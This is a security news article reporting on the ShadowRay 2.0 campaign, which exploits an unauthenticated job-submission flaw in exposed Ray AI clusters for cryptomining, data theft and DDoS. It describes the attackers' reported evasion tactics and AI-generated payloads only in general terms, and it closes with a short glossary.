Netcrook Logo
👤 GHOSTCOMPLY
🗓️ 19 Nov 2025  

AI Clusters Under Siege: ShadowRay 2.0 Turns Supercomputers Into Crypto Mines

ShadowRay 2.0 exploits a lingering flaw in Ray clusters, hijacking vast AI infrastructure for cryptocurrency mining, data theft, and cyberattacks - while evading detection with AI-generated code.

Fast Facts

  • ShadowRay 2.0 is a global cyberattack hijacking Ray clusters with an old, unfixed vulnerability.
  • The attackers use AI-generated code to mine cryptocurrency, steal data, and launch DDoS attacks.
  • Over 230,000 Ray servers are now exposed online, up from just a few thousand last year.
  • The main flaw, CVE-2023-48022, remains unpatched; Ray was designed for trusted environments.
  • Attackers disguise their malware and eliminate rival miners to monopolize compromised systems.

The Shadow Looms: A New Breed of Cyberattack

Picture a digital gold rush where the pickaxes are lines of code and the mines are powerful computers meant for artificial intelligence. In the latest wave of cybercrime, attackers have set their sights on Ray clusters - distributed computing systems designed to supercharge AI and Python workloads. But instead of training smart models, these clusters are now being forced to dig for digital gold: cryptocurrency.

What Is Ray and Why Is It Vulnerable?

Ray, an open-source framework by Anyscale, allows companies and researchers to run AI and data processing jobs across many computers at once. It was built under the assumption that these clusters would live inside trusted, tightly controlled networks. But as cloud adoption boomed, thousands of Ray servers have ended up exposed to the public internet - an open invitation for hackers.

The core of the problem? A critical vulnerability, CVE-2023-48022, lets anyone submit jobs to Ray’s system without proper authentication. Since the software wasn’t designed to face the wilds of the internet, no fix has been released - leaving a door wide open.

ShadowRay 2.0: AI-Generated Malware With a Mission

Enter ShadowRay 2.0, a campaign traced to a threat actor dubbed IronErn440. According to Oligo Security, this attacker uses AI-powered tools - think ChatGPT for cybercrime - to craft malicious payloads. These scripts don’t just mine Monero cryptocurrency; they also open backdoors, steal data and credentials, and can unleash distributed denial-of-service (DDoS) attacks to disrupt other systems.

The malware is clever: it checks how powerful a system is, only uses part of the computer’s resources to avoid being noticed, and hides itself with innocent-sounding names like "dns-filter." It even kicks out other hackers’ mining scripts, ensuring it alone profits from the hijacked hardware. Updates are pulled regularly from GitHub, making the attack adaptable and persistent.

Wider Ripples: Risks for AI and Cloud Ecosystems

The scale of exposure is staggering - over 230,000 Ray servers are now potentially at risk, reflecting the explosive growth of public cloud infrastructure. The same kinds of attacks have hit other distributed computing tools in recent years, such as Kubernetes and Hadoop, with similar vulnerabilities exploited for cryptomining and botnets. As AI becomes more central to business and research, the stakes for securing these clusters have never been higher.

While Anyscale and security experts urge users to lock down their clusters with firewalls and strict access controls, the lack of a software fix means the shadow hanging over Ray will persist. For now, the battle is one of vigilance and best practices, as hackers continue to evolve their methods - sometimes with the very AI tools these clusters were meant to empower.

The ShadowRay 2.0 saga is a cautionary tale for the age of AI: in the race to scale, security can’t be left behind. As the boundaries between innovation and exploitation blur, organizations must rethink what it means to trust - and defend - their most powerful machines.

WIKICROOK

  • Ray Cluster: A Ray Cluster is a network of computers using the Ray framework to run large-scale AI and data processing tasks efficiently and in parallel.
  • Cryptomining: Cryptomining uses computer power to solve puzzles and earn digital currencies, sometimes exploiting devices without the owner’s knowledge or consent.
  • CVE: CVE, or Common Vulnerabilities and Exposures, is a system for uniquely identifying and tracking publicly known cybersecurity flaws in software and hardware.
  • DDoS Attack: A DDoS attack is when many computers flood a service with fake requests, overwhelming it and making it slow or unavailable to real users.
  • AI: AI, or Artificial Intelligence, is technology that enables machines to mimic human intelligence, learning from data and improving over time.
AI Clusters Cyberattack Cryptomining
GHOSTCOMPLY GHOSTCOMPLY
Compliance & Legal-Tech Advisor
← Back to news